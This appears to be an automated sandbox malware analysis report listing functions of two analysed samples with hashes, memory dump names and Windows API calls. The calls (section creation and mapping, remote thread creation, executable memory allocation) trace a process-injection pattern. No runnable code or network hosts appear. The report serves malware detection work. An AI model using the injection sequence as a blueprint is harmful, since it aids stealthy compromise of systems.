Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693

Memory Dump Source

Source File: 00000006.00000002.1370104401.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_PSyWSlhDa5.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 973fe8c7f692c8164376a233d22da1c8e21a759768f578ec8ae17a8f290018c7
Instruction ID: 220a72f44c34cad911d214d6bf830d158092726683e2111099ccb198781fee4b
Opcode Fuzzy Hash: 973fe8c7f692c8164376a233d22da1c8e21a759768f578ec8ae17a8f290018c7
Instruction Fuzzy Hash: 1311BCB1648204FADA009A849C62E7A3228AB41754F204137BA47B90F1C57DA913EAAF

Function 00401970 Relevance: 1.3, APIs: 1, Instructions: 56
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0

Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693

Memory Dump Source

Source File: 00000006.00000002.1370104401.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_PSyWSlhDa5.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: b0ddfabd172ae9c3cb26196b0cb86bb5accc73c170931bda3ffef6ca5bc85053
Instruction ID: edf3ac2f4a0a3dadc82130375ffc9a201d65d5ca35b25829e414e95522c05f9b
Opcode Fuzzy Hash: b0ddfabd172ae9c3cb26196b0cb86bb5accc73c170931bda3ffef6ca5bc85053
Instruction Fuzzy Hash: AA01C0B174C104EBDB009A84DC62E7A3214AF41704F204537BA57B91F1C53EAA23FB5B

Function 00401977 Relevance: 1.3, APIs: 1, Instructions: 56
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0

Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693

Memory Dump Source

Source File: 00000006.00000002.1370104401.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_PSyWSlhDa5.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 547ce1ee7459762dd25db0cd36bc5e4baa4f04934683c573935985333de64e11
Instruction ID: c889a794982209429869940d23560ef391d683eb1520a1ae8baa03dfc3eb9000
Opcode Fuzzy Hash: 547ce1ee7459762dd25db0cd36bc5e4baa4f04934683c573935985333de64e11
Instruction Fuzzy Hash: E601E1B1308100EBD7009B849C51ABA3614AF41314F20413BB957790E2C53EAA22EB5B

Function 00401987 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0

Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693

Memory Dump Source

Source File: 00000006.00000002.1370104401.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_PSyWSlhDa5.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 48afa338b6eb4ead81a9d6383d5bdcf6d33ddda25fb9a1f4e9ca7df9d9b0c8b0
Instruction ID: 1aa0efa7bda459d32f82bf33ce90feabc7a2b43109eca8adeaaf204144b81d62
Opcode Fuzzy Hash: 48afa338b6eb4ead81a9d6383d5bdcf6d33ddda25fb9a1f4e9ca7df9d9b0c8b0
Instruction Fuzzy Hash: C201C0B1708104EBDB009A84DC62E7A3214AF41714F204137BA57791F1C53EAA23FB5B

Function 0040198A Relevance: 1.3, APIs: 1, Instructions: 50
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0

Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693

Memory Dump Source

Source File: 00000006.00000002.1370104401.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_PSyWSlhDa5.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 66f4d7de36bf33a8276767325b567db769fa807301e16b4e03cd2b1c881b4aa0
Instruction ID: 93e9f4b763319a312fe66b3304ba82e0c9e14e36225fd67d869cb8e68c59c211
Opcode Fuzzy Hash: 66f4d7de36bf33a8276767325b567db769fa807301e16b4e03cd2b1c881b4aa0
Instruction Fuzzy Hash: 5501B572308244EBDB019F90DC92EAE3728AF45318F24017BB557790E2C53DA912EB1B

Function 00601863 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006018B4

Memory Dump Source

Source File: 00000006.00000002.1370451305.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5f0000_PSyWSlhDa5.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: cea9dcbd19cacf27efdb17fe48286a664f3cb230686dbcd2d03f354e3583355d
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 9C113C79A40208EFDB01DF98C985E99BBF5AF09351F05C0A4F9489B362D371EA50DF80

Non-executed Functions

Function 0062092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 0062095F
GetProcAddress., xrefs: 006209DC, 006209DF, 006209E4
l, xrefs: 00620966

Memory Dump Source

Source File: 00000006.00000002.1370487735.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_PSyWSlhDa5.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 2ba7ce5c814ab9565d4597d47c006d941323b89efae0f9c485d6973fd74c974a
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: BF3138B6901619DFEB10CF99D880AEDBBF6FF48324F14504AD441A7312D771AA85CFA4

Function 00402721 Relevance: 1.4, Strings: 1, Instructions: 151COMMON

Download Yara Rule

Strings

#X%, xrefs: 0040273A

Memory Dump Source

Source File: 00000006.00000002.1370104401.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_PSyWSlhDa5.jbxd

Similarity

API ID:
String ID: #X%
API String ID: 0-730838689
Opcode ID: 245b7a6330694b5c367d3b257ccbe4366a0bf95add0a101e660e11a0368d02b9
Instruction ID: 71e09992ebba1ebce1a14e5228dc5e73fa07ad40964d1ad344f7d49068a62d69
Opcode Fuzzy Hash: 245b7a6330694b5c367d3b257ccbe4366a0bf95add0a101e660e11a0368d02b9
Instruction Fuzzy Hash: 2441DC352485539DC30299188E899EABF79FDC7398B10017ED8C2AB9D3CBA02517D3B6

Function 00401A28 Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1370104401.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_PSyWSlhDa5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24dfe36045d0991ac749a0892ad312c9a4e30bcc45954bcab72f1b8cf2b0dd63
Instruction ID: 18334b27c1f95b13a70b5794667acb6e5ebe9408c321dbf9d60f89b0be35e569
Opcode Fuzzy Hash: 24dfe36045d0991ac749a0892ad312c9a4e30bcc45954bcab72f1b8cf2b0dd63
Instruction Fuzzy Hash: AA51AE612492109FE71989358C829B637219F43726F2C327FE98267EE6D379D4438A4A

Function 00601481 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1370451305.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5f0000_PSyWSlhDa5.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 9f0bb460c473a473903cdf511d4bd639a60afbd83ee4336c7d7f37e7ffe86e4f
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: DD113C72380100AFD758DE55DC91EA773EAEB89320B298069E909CF356E675EC42C760

Function 00620D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1370487735.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_PSyWSlhDa5.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 24baee486935e57d3a0b741057cb9f05ffc7e32a8ab280632829428391162b7e
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 0301F776601A108FEF21CF60E804BEA33F7EF85305F0548E4D90697342E770A8418F80

Analysis Process: jhfrihrPID: 7348, Parent PID: 932COMMON

Execution Graph

Execution Coverage:	8.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	108
Total number of Limit Nodes:	2

Executed Functions

Function 00401583 Relevance: 10.7, APIs: 7, Instructions: 203
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745

Memory Dump Source

Source File: 0000000B.00000002.1590668886.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_jhfrihr.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: d8025aa2a73fa1757bf9d96cb7b1acd78e4ac8c64498884b03c6ab91ddf532bc
Instruction ID: f2d5e20ae79a609852431105b0704d648b73f45673a5aa535929140ce5e9a1ec
Opcode Fuzzy Hash: d8025aa2a73fa1757bf9d96cb7b1acd78e4ac8c64498884b03c6ab91ddf532bc
Instruction Fuzzy Hash: 42614DB0900209FFEB218F91CC48FAF7BB8EF85710F10012AF952BA1E5D6749941DB25

Function 0040158E Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745

Memory Dump Source

Source File: 0000000B.00000002.1590668886.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_jhfrihr.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: b0195c2069dc6e331d8d87e09b392f04d65fbe6eaf74cb5c44d370e3a2e163ea
Instruction ID: 0dfbee2a1f0830b6acdc9e972913786be015a59f94024eee438c43ca1dd55f4f
Opcode Fuzzy Hash: b0195c2069dc6e331d8d87e09b392f04d65fbe6eaf74cb5c44d370e3a2e163ea
Instruction Fuzzy Hash: BA5139B1900249BFEF218F91CC49FEBBFB8EF86714F140159F951AA2A5D670A941CB24

Function 004015BC Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745

Memory Dump Source

Source File: 0000000B.00000002.1590668886.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_jhfrihr.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: cc208e499be32a7b8d2e1b8f44698ba7bae8291931bb2c7a737ae2018edfaae9
Instruction ID: 9e9cfe78a9b9fcbe8a20f4c56589f3f995e8910032e3214eb5438fd9bfe06916
Opcode Fuzzy Hash: cc208e499be32a7b8d2e1b8f44698ba7bae8291931bb2c7a737ae2018edfaae9
Instruction Fuzzy Hash: 855129B1900249BFEF218F91CC48FAFBBB8EF86B15F100159F951AA2A5D7709940CB20

Function 00403054 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 0040317C
NtTerminateProcess.NTDLL ref: 0040318D

Memory Dump Source

Source File: 0000000B.00000002.1590668886.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_jhfrihr.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
Instruction ID: bb3d83799e525a3431e0f051c565fd2002d42970a2b52bf5f395df3a052ac564
Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
Instruction Fuzzy Hash: 9F412732618E0C4FD768EE6CA84966377D5E798311F1A43ABD809D7389EE30D85187C5

Function 004E003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004E024D

Strings

cess, xrefs: 004E018D
kernel32.dll, xrefs: 004E008F, 004E0095

Memory Dump Source

Source File: 0000000B.00000002.1590943156.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e0000_jhfrihr.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 0081b0556e17fab112a9901bdf31d18a609d4019900529a049e2bf45be3bf3fc
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 51529974A00269DFDB64CF59C984BA8BBB1BF09305F1480DAE41DAB351DB74AE85CF14

Function 005F1BA4 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005F1BCC
Module32First.KERNEL32(00000000,00000224), ref: 005F1BEC

Memory Dump Source

Source File: 0000000B.00000002.1591052783.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5e0000_jhfrihr.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: ea7586ce3f6d32c40573b988d675d9194c20edb9377f7adb2641dc2feb653b2a
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: E4F0C231200B1AEBD7203BF9988CABA7AE8BF58721F100129E743D10C0EA78EC054668

Function 004E0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,004E0223,?,?), ref: 004E0E19
SetErrorMode.KERNELBASE(00000000,?,?,004E0223,?,?), ref: 004E0E1E

Memory Dump Source

Source File: 0000000B.00000002.1590943156.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e0000_jhfrihr.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 48ed06c69d374c95c1802b7477aefdcf9cd8afad3e06eac9cc97ddeb4b77a536
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: BBD0123114512877D7002A95DC09BCE7B1CDF05B63F008421FB0DD9180C7B4994046E9

Function 00401919 Relevance: 1.3, APIs: 1, Instructions: 79
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0

Memory Dump Source

Source File: 0000000B.00000002.1590668886.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_jhfrihr.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2b935ac753e934015516d799e1095bac90694ea099bafde975148c207ca850c9
Instruction ID: 49835af623e861a6f2ddbc0bf662c5c40176c384461ea98b099af7f339eb22c4
Opcode Fuzzy Hash: 2b935ac753e934015516d799e1095bac90694ea099bafde975148c207ca850c9
Instruction Fuzzy Hash: 7911DCB234C201EBD6009A84A862E7A3214AB51359F304537FA57B90F2D57D9A13F76F

Function 00401959 Relevance: 1.3, APIs: 1, Instructions: 66
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0

Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693

Memory Dump Source

Source File: 0000000B.00000002.1590668886.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_jhfrihr.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 973fe8c7f692c8164376a233d22da1c8e21a759768f578ec8ae17a8f290018c7
Instruction ID: 220a72f44c34cad911d214d6bf830d158092726683e2111099ccb198781fee4b
Opcode Fuzzy Hash: 973fe8c7f692c8164376a233d22da1c8e21a759768f578ec8ae17a8f290018c7
Instruction Fuzzy Hash: 1311BCB1648204FADA009A849C62E7A3228AB41754F204137BA47B90F1C57DA913EAAF

Function 00401970 Relevance: 1.3, APIs: 1, Instructions: 56
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0

Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693

Memory Dump Source

Source File: 0000000B.00000002.1590668886.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_jhfrihr.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: b0ddfabd172ae9c3cb26196b0cb86bb5accc73c170931bda3ffef6ca5bc85053
Instruction ID: edf3ac2f4a0a3dadc82130375ffc9a201d65d5ca35b25829e414e95522c05f9b
Opcode Fuzzy Hash: b0ddfabd172ae9c3cb26196b0cb86bb5accc73c170931bda3ffef6ca5bc85053
Instruction Fuzzy Hash: AA01C0B174C104EBDB009A84DC62E7A3214AF41704F204537BA57B91F1C53EAA23FB5B

Function 00401977 Relevance: 1.3, APIs: 1, Instructions: 56
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0

Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693

Memory Dump Source

Source File: 0000000B.00000002.1590668886.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_jhfrihr.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 547ce1ee7459762dd25db0cd36bc5e4baa4f04934683c573935985333de64e11
Instruction ID: c889a794982209429869940d23560ef391d683eb1520a1ae8baa03dfc3eb9000
Opcode Fuzzy Hash: 547ce1ee7459762dd25db0cd36bc5e4baa4f04934683c573935985333de64e11
Instruction Fuzzy Hash: E601E1B1308100EBD7009B849C51ABA3614AF41314F20413BB957790E2C53EAA22EB5B

Function 00401987 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0

Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693

Memory Dump Source

Source File: 0000000B.00000002.1590668886.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_jhfrihr.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 48afa338b6eb4ead81a9d6383d5bdcf6d33ddda25fb9a1f4e9ca7df9d9b0c8b0
Instruction ID: 1aa0efa7bda459d32f82bf33ce90feabc7a2b43109eca8adeaaf204144b81d62
Opcode Fuzzy Hash: 48afa338b6eb4ead81a9d6383d5bdcf6d33ddda25fb9a1f4e9ca7df9d9b0c8b0
Instruction Fuzzy Hash: C201C0B1708104EBDB009A84DC62E7A3214AF41714F204137BA57791F1C53EAA23FB5B

Function 0040198A Relevance: 1.3, APIs: 1, Instructions: 50
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0

Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693

Memory Dump Source

Source File: 0000000B.00000002.1590668886.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_jhfrihr.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 66f4d7de36bf33a8276767325b567db769fa807301e16b4e03cd2b1c881b4aa0
Instruction ID: 93e9f4b763319a312fe66b3304ba82e0c9e14e36225fd67d869cb8e68c59c211
Opcode Fuzzy Hash: 66f4d7de36bf33a8276767325b567db769fa807301e16b4e03cd2b1c881b4aa0
Instruction Fuzzy Hash: 5501B572308244EBDB019F90DC92EAE3728AF45318F24017BB557790E2C53DA912EB1B

Function 005F1863 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005F18B4

Memory Dump Source

Source File: 0000000B.00000002.1591052783.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5e0000_jhfrihr.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
